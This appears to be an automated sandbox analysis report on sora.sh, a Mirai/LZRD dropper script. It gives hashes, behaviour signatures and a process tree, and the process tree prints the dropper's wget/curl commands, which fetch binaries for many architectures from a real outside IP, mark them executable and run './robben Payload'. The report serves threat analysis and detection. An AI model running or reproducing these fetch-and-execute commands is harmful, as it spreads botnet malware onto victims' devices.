Analysis
max time kernel: 149s
max time network: 152s
platform: ubuntu-18.04_amd64
resource: ubuntu1804-amd64-20240508-en
resource tags: arch:amd64, arch:i386, image:ubuntu1804-amd64-20240508-en, kernel:4.15.0-213-generic, locale:en-us, os:ubuntu-18.04-amd64, system
submitted: 29-08-2024 20:19
Static task: static1
Behavioral task: behavioral1 (sample: sora.sh, resource: ubuntu1804-amd64-20240508-en)
Behavioral task: behavioral2 (sample: sora.sh, resource: debian9-armhf-20240611-en)
Behavioral task: behavioral3 (sample: sora.sh, resource: debian9-mipsbe-20240729-en)
General
Target: sora.sh
Size: 1KB
MD5: 4bad6b7a8f3a112f1e8a64415b2c5e57
SHA1: 80386ebec3b511cd2a07da88e300a62590b8d889
SHA256: 4483a53f61944b8183d1941626bb43ff3a0f8196930441fe4c791a76cd87fb77
SHA512: da9c99687356c636a26e11083032cee8d31f7105e64ade4d20f54e3ba22085ed9a5749674684622dce428287410b404b84d546a91e050afadf0b7b7485647aed
Malware Config
Extracted: mirai, LZRD
Signatures
- Contacts a large (198741) amount of remote hosts (1 TTP)
  This may indicate a network scan to discover remotely running services.
- Creates a large amount of network flows (1 TTP)
  This may indicate a network scan to discover remotely running services.
- Executes dropped EXE (10 IoCs)
  ioc | pid | Process
  /tmp/robben | 1513 | robben
  /tmp/robben | 1524 | robben
  /tmp/robben | 1535 | robben
  /tmp/robben | 1546 | robben
  /tmp/robben | 1557 | robben
  /tmp/robben | 1568 | robben
  /tmp/robben | 1579 | robben
  /tmp/robben | 1590 | robben
  /tmp/robben | 1601 | robben
  /tmp/robben | 1612 | robben
- Modifies Watchdog functionality (1 TTP, 20 IoCs)
  Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.
  description | ioc | Process
  File opened for modification | /dev/misc/watchdog | robben
  File opened for modification | /dev/watchdog | robben
  File opened for modification | /dev/misc/watchdog | robben
  File opened for modification | /dev/watchdog | robben
  File opened for modification | /dev/misc/watchdog | robben
  File opened for modification | /dev/misc/watchdog | robben
  File opened for modification | /dev/watchdog | robben
  File opened for modification | /dev/watchdog | robben
  File opened for modification | /dev/misc/watchdog | robben
  File opened for modification | /dev/watchdog | robben
  File opened for modification | /dev/misc/watchdog | robben
  File opened for modification | /dev/watchdog | robben
  File opened for modification | /dev/misc/watchdog | robben
  File opened for modification | /dev/watchdog | robben
  File opened for modification | /dev/watchdog | robben
  File opened for modification | /dev/misc/watchdog | robben
  File opened for modification | /dev/misc/watchdog | robben
  File opened for modification | /dev/watchdog | robben
  File opened for modification | /dev/watchdog | robben
  File opened for modification | /dev/misc/watchdog | robben
- (yara_rule match)
  resource | yara_rule
  behavioral1/files/fstream-1.dat | upx
- Enumerates running processes
  Discovers information about currently running processes on the system.
- Reads runtime system information (64 IoCs)
  Reads data from the /proc virtual filesystem.
- Writes file to tmp directory (20 IoCs)
  Malware often drops required files in the /tmp directory.
  description | ioc | Process
  File opened for modification | /tmp/sora.arm6 | curl
  File opened for modification | /tmp/sora.ppc | curl
  File opened for modification | /tmp/sora.m68k | wget
  File opened for modification | /tmp/sora.x86 | curl
  File opened for modification | /tmp/robben | sora.sh
  File opened for modification | /tmp/sora.mips | wget
  File opened for modification | /tmp/sora.arm4 | curl
  File opened for modification | /tmp/sora.arm5 | curl
  File opened for modification | /tmp/sora.sh4 | wget
  File opened for modification | /tmp/sora.x86 | wget
  File opened for modification | /tmp/sora.mpsl | wget
  File opened for modification | /tmp/sora.arm6 | wget
  File opened for modification | /tmp/sora.ppc | wget
  File opened for modification | /tmp/sora.m68k | curl
  File opened for modification | /tmp/sora.mips | curl
  File opened for modification | /tmp/sora.mpsl | curl
  File opened for modification | /tmp/sora.arm7 | curl
  File opened for modification | /tmp/sora.arm5 | wget
  File opened for modification | /tmp/sora.arm7 | wget
  File opened for modification | /tmp/sora.sh4 | curl
Processes (child processes are indented under their parent)
- /tmp/sora.sh
  command: /tmp/sora.sh
  signatures: Writes file to tmp directory
  PID: 1504
  - /usr/bin/wget
    command: wget http://154.216.17.67/bins/sora.x86
    signatures: Writes file to tmp directory
    PID: 1505
  - /usr/bin/curl
    command: curl -O http://154.216.17.67/bins/sora.x86
    signatures: Writes file to tmp directory
    PID: 1510
  - /bin/cat
    command: cat sora.x86
    PID: 1511
  - /bin/chmod
    command: chmod +x config-err-MsoZIU netplan_6etimwxp robben snap-private-tmp sora.sh sora.x86 ssh-QG10K9MbVSH7 systemd-private-da77271824104e4081ce2dbfbe9918d7-bolt.service-NWe0PJ systemd-private-da77271824104e4081ce2dbfbe9918d7-colord.service-jJgtGR systemd-private-da77271824104e4081ce2dbfbe9918d7-ModemManager.service-hTy2A2 systemd-private-da77271824104e4081ce2dbfbe9918d7-systemd-resolved.service-pQGkqe systemd-private-da77271824104e4081ce2dbfbe9918d7-systemd-timedated.service-HRtjHp
    PID: 1512
  - /tmp/robben
    command: ./robben Payload
    signatures: Executes dropped EXE; Modifies Watchdog functionality; Reads runtime system information
    PID: 1513
  - /usr/bin/wget
    command: wget http://154.216.17.67/bins/sora.mips
    signatures: Writes file to tmp directory
    PID: 1517
  - /usr/bin/curl
    command: curl -O http://154.216.17.67/bins/sora.mips
    signatures: Writes file to tmp directory
    PID: 1521
  - /bin/chmod
    command: chmod +x config-err-MsoZIU netplan_6etimwxp robben snap-private-tmp sora.mips sora.sh sora.x86 ssh-QG10K9MbVSH7 systemd-private-da77271824104e4081ce2dbfbe9918d7-bolt.service-NWe0PJ systemd-private-da77271824104e4081ce2dbfbe9918d7-colord.service-jJgtGR systemd-private-da77271824104e4081ce2dbfbe9918d7-ModemManager.service-hTy2A2 systemd-private-da77271824104e4081ce2dbfbe9918d7-systemd-resolved.service-pQGkqe systemd-private-da77271824104e4081ce2dbfbe9918d7-systemd-timedated.service-HRtjHp
    PID: 1523
  - /tmp/robben
    command: ./robben Payload
    signatures: Executes dropped EXE; Modifies Watchdog functionality; Reads runtime system information
    PID: 1524
  - /usr/bin/wget
    command: wget http://154.216.17.67/bins/sora.mpsl
    signatures: Writes file to tmp directory
    PID: 1528
  - /usr/bin/curl
    command: curl -O http://154.216.17.67/bins/sora.mpsl
    signatures: Writes file to tmp directory
    PID: 1532
  - /bin/chmod
    command: chmod +x config-err-MsoZIU netplan_6etimwxp robben snap-private-tmp sora.mips sora.mpsl sora.sh sora.x86 ssh-QG10K9MbVSH7 systemd-private-da77271824104e4081ce2dbfbe9918d7-bolt.service-NWe0PJ systemd-private-da77271824104e4081ce2dbfbe9918d7-colord.service-jJgtGR systemd-private-da77271824104e4081ce2dbfbe9918d7-ModemManager.service-hTy2A2 systemd-private-da77271824104e4081ce2dbfbe9918d7-systemd-resolved.service-pQGkqe systemd-private-da77271824104e4081ce2dbfbe9918d7-systemd-timedated.service-HRtjHp
    PID: 1534
  - /tmp/robben
    command: ./robben Payload
    signatures: Executes dropped EXE; Modifies Watchdog functionality; Reads runtime system information
    PID: 1535
  - /usr/bin/wget
    command: wget http://154.216.17.67/bins/sora.arm4
    PID: 1539
  - /usr/bin/curl
    command: curl -O http://154.216.17.67/bins/sora.arm4
    signatures: Writes file to tmp directory
    PID: 1543
  - /bin/chmod
    command: chmod +x config-err-MsoZIU netplan_6etimwxp robben snap-private-tmp sora.arm4 sora.mips sora.mpsl sora.sh sora.x86 ssh-QG10K9MbVSH7 systemd-private-da77271824104e4081ce2dbfbe9918d7-bolt.service-NWe0PJ systemd-private-da77271824104e4081ce2dbfbe9918d7-colord.service-jJgtGR systemd-private-da77271824104e4081ce2dbfbe9918d7-ModemManager.service-hTy2A2 systemd-private-da77271824104e4081ce2dbfbe9918d7-systemd-resolved.service-pQGkqe systemd-private-da77271824104e4081ce2dbfbe9918d7-systemd-timedated.service-HRtjHp
    PID: 1545
  - /tmp/robben
    command: ./robben Payload
    signatures: Executes dropped EXE; Modifies Watchdog functionality; Reads runtime system information
    PID: 1546
  - /usr/bin/wget
    command: wget http://154.216.17.67/bins/sora.arm5
    signatures: Writes file to tmp directory
    PID: 1550
  - /usr/bin/curl
    command: curl -O http://154.216.17.67/bins/sora.arm5
    signatures: Writes file to tmp directory
    PID: 1554
  - /bin/chmod
    command: chmod +x config-err-MsoZIU netplan_6etimwxp robben snap-private-tmp sora.arm4 sora.arm5 sora.mips sora.mpsl sora.sh sora.x86 ssh-QG10K9MbVSH7 systemd-private-da77271824104e4081ce2dbfbe9918d7-bolt.service-NWe0PJ systemd-private-da77271824104e4081ce2dbfbe9918d7-colord.service-jJgtGR systemd-private-da77271824104e4081ce2dbfbe9918d7-ModemManager.service-hTy2A2 systemd-private-da77271824104e4081ce2dbfbe9918d7-systemd-resolved.service-pQGkqe systemd-private-da77271824104e4081ce2dbfbe9918d7-systemd-timedated.service-HRtjHp
    PID: 1556
  - /tmp/robben
    command: ./robben Payload
    signatures: Executes dropped EXE; Modifies Watchdog functionality; Reads runtime system information
    PID: 1557
  - /usr/bin/wget
    command: wget http://154.216.17.67/bins/sora.arm6
    signatures: Writes file to tmp directory
    PID: 1561
  - /usr/bin/curl
    command: curl -O http://154.216.17.67/bins/sora.arm6
    signatures: Writes file to tmp directory
    PID: 1565
  - /bin/chmod
    command: chmod +x config-err-MsoZIU netplan_6etimwxp robben snap-private-tmp sora.arm4 sora.arm5 sora.arm6 sora.mips sora.mpsl sora.sh sora.x86 ssh-QG10K9MbVSH7 systemd-private-da77271824104e4081ce2dbfbe9918d7-bolt.service-NWe0PJ systemd-private-da77271824104e4081ce2dbfbe9918d7-colord.service-jJgtGR systemd-private-da77271824104e4081ce2dbfbe9918d7-ModemManager.service-hTy2A2 systemd-private-da77271824104e4081ce2dbfbe9918d7-systemd-resolved.service-pQGkqe systemd-private-da77271824104e4081ce2dbfbe9918d7-systemd-timedated.service-HRtjHp
    PID: 1567
  - /tmp/robben
    command: ./robben Payload
    signatures: Executes dropped EXE; Modifies Watchdog functionality; Reads runtime system information
    PID: 1568
  - /usr/bin/wget
    command: wget http://154.216.17.67/bins/sora.arm7
    signatures: Writes file to tmp directory
    PID: 1572
  - /usr/bin/curl
    command: curl -O http://154.216.17.67/bins/sora.arm7
    signatures: Writes file to tmp directory
    PID: 1576
  - /bin/chmod
    command: chmod +x config-err-MsoZIU netplan_6etimwxp robben snap-private-tmp sora.arm4 sora.arm5 sora.arm6 sora.arm7 sora.mips sora.mpsl sora.sh sora.x86 ssh-QG10K9MbVSH7 systemd-private-da77271824104e4081ce2dbfbe9918d7-bolt.service-NWe0PJ systemd-private-da77271824104e4081ce2dbfbe9918d7-colord.service-jJgtGR systemd-private-da77271824104e4081ce2dbfbe9918d7-ModemManager.service-hTy2A2 systemd-private-da77271824104e4081ce2dbfbe9918d7-systemd-resolved.service-pQGkqe systemd-private-da77271824104e4081ce2dbfbe9918d7-systemd-timedated.service-HRtjHp
    PID: 1578
  - /tmp/robben
    command: ./robben Payload
    signatures: Executes dropped EXE; Modifies Watchdog functionality; Reads runtime system information
    PID: 1579
  - /usr/bin/wget
    command: wget http://154.216.17.67/bins/sora.ppc
    signatures: Writes file to tmp directory
    PID: 1583
  - /usr/bin/curl
    command: curl -O http://154.216.17.67/bins/sora.ppc
    signatures: Writes file to tmp directory
    PID: 1587
  - /bin/chmod
    command: chmod +x config-err-MsoZIU netplan_6etimwxp robben snap-private-tmp sora.arm4 sora.arm5 sora.arm6 sora.arm7 sora.mips sora.mpsl sora.ppc sora.sh sora.x86 ssh-QG10K9MbVSH7 systemd-private-da77271824104e4081ce2dbfbe9918d7-bolt.service-NWe0PJ systemd-private-da77271824104e4081ce2dbfbe9918d7-colord.service-jJgtGR systemd-private-da77271824104e4081ce2dbfbe9918d7-ModemManager.service-hTy2A2 systemd-private-da77271824104e4081ce2dbfbe9918d7-systemd-resolved.service-pQGkqe systemd-private-da77271824104e4081ce2dbfbe9918d7-systemd-timedated.service-HRtjHp
    PID: 1589
  - /tmp/robben
    command: ./robben Payload
    signatures: Executes dropped EXE; Modifies Watchdog functionality; Reads runtime system information
    PID: 1590
  - /usr/bin/wget
    command: wget http://154.216.17.67/bins/sora.m68k
    signatures: Writes file to tmp directory
    PID: 1594
  - /usr/bin/curl
    command: curl -O http://154.216.17.67/bins/sora.m68k
    signatures: Writes file to tmp directory
    PID: 1598
  - /bin/chmod
    command: chmod +x config-err-MsoZIU netplan_6etimwxp robben snap-private-tmp sora.arm4 sora.arm5 sora.arm6 sora.arm7 sora.m68k sora.mips sora.mpsl sora.ppc sora.sh sora.x86 ssh-QG10K9MbVSH7 systemd-private-da77271824104e4081ce2dbfbe9918d7-bolt.service-NWe0PJ systemd-private-da77271824104e4081ce2dbfbe9918d7-colord.service-jJgtGR systemd-private-da77271824104e4081ce2dbfbe9918d7-ModemManager.service-hTy2A2 systemd-private-da77271824104e4081ce2dbfbe9918d7-systemd-resolved.service-pQGkqe systemd-private-da77271824104e4081ce2dbfbe9918d7-systemd-timedated.service-HRtjHp
    PID: 1600
  - /tmp/robben
    command: ./robben Payload
    signatures: Executes dropped EXE; Modifies Watchdog functionality; Reads runtime system information
    PID: 1601
  - /usr/bin/wget
    command: wget http://154.216.17.67/bins/sora.sh4
    signatures: Writes file to tmp directory
    PID: 1605
  - /usr/bin/curl
    command: curl -O http://154.216.17.67/bins/sora.sh4
    signatures: Writes file to tmp directory
    PID: 1609
  - /bin/chmod
    command: chmod +x config-err-MsoZIU netplan_6etimwxp robben snap-private-tmp sora.arm4 sora.arm5 sora.arm6 sora.arm7 sora.m68k sora.mips sora.mpsl sora.ppc sora.sh sora.sh4 sora.x86 ssh-QG10K9MbVSH7 systemd-private-da77271824104e4081ce2dbfbe9918d7-bolt.service-NWe0PJ systemd-private-da77271824104e4081ce2dbfbe9918d7-colord.service-jJgtGR systemd-private-da77271824104e4081ce2dbfbe9918d7-ModemManager.service-hTy2A2 systemd-private-da77271824104e4081ce2dbfbe9918d7-systemd-resolved.service-pQGkqe systemd-private-da77271824104e4081ce2dbfbe9918d7-systemd-timedated.service-HRtjHp
    PID: 1611
  - /tmp/robben
    command: ./robben Payload
    signatures: Executes dropped EXE; Modifies Watchdog functionality; Reads runtime system information
    PID: 1612
Network
MITRE ATT&CK Enterprise v15
Downloads
- Filesize: 30KB
  MD5: bcff8f405bdd93b8488e6f6aca117a32
  SHA1: 8b32a1dea70be2c76830e3808f70ad62eb3b1250
  SHA256: 67180595f06f283c60b26bffa32965d897f0234e5ab8d9fe5510773b3712f396
  SHA512: 5d9e20aeb055eb0c535db9c42d4ccb9f68342b196f9816e1f634147c63dcf4b1dedf5be0b8f7b2ade2676cff752e2418e9b446804fee5a61a24e7a57c845c48a